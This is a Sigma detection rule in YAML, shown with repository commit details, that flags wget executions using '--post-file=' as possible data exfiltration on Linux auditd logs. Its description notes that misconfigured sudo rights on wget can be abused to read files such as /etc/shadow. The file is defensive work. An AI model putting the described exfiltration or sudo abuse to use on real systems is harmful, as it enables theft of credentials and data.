Nasreddine Bencherchali
5656c48a97
chore: rename auditd folders and others update: Audio Capture - Updated syscall field to SYSCALL in order to make use of enriched logs update: ASLR Disabled Via Sysctl or Direct Syscall - Linux - Updated syscall field to SYSCALL in order to make use of enriched logs update: Clear or Disable Kernel Ring Buffer Logs via Syslog Syscall - Updated syscall field to SYSCALL in order to make use of enriched logs update: System Info Discovery via Sysinfo Syscall - Updated syscall field to SYSCALL in order to make use of enriched logs update: Special File Creation via Mknod Syscall - Updated syscall field to SYSCALL in order to make use of enriched logs update: Webshell Remote Command Execution - Updated syscall field to SYSCALL in order to make use of enriched logs
28 lines
816 B
YAML
28 lines
816 B
YAML
title: Data Exfiltration with Wget
|
|
id: cb39d16b-b3b6-4a7a-8222-1cf24b686ffc
|
|
status: test
|
|
description: |
|
|
Detects attempts to post the file with the usage of wget utility.
|
|
The adversary can bypass the permission restriction with the misconfigured sudo permission for wget utility which could allow them to read files like /etc/shadow.
|
|
references:
|
|
- https://linux.die.net/man/1/wget
|
|
- https://gtfobins.github.io/gtfobins/wget/
|
|
author: 'Pawel Mazur'
|
|
date: 2021-11-18
|
|
modified: 2022-12-25
|
|
tags:
|
|
- attack.exfiltration
|
|
- attack.t1048.003
|
|
logsource:
|
|
product: linux
|
|
service: auditd
|
|
detection:
|
|
selection:
|
|
type: EXECVE
|
|
a0: wget
|
|
a1|startswith: '--post-file='
|
|
condition: selection
|
|
falsepositives:
|
|
- Legitimate usage of wget utility to post a file
|
|
level: medium
|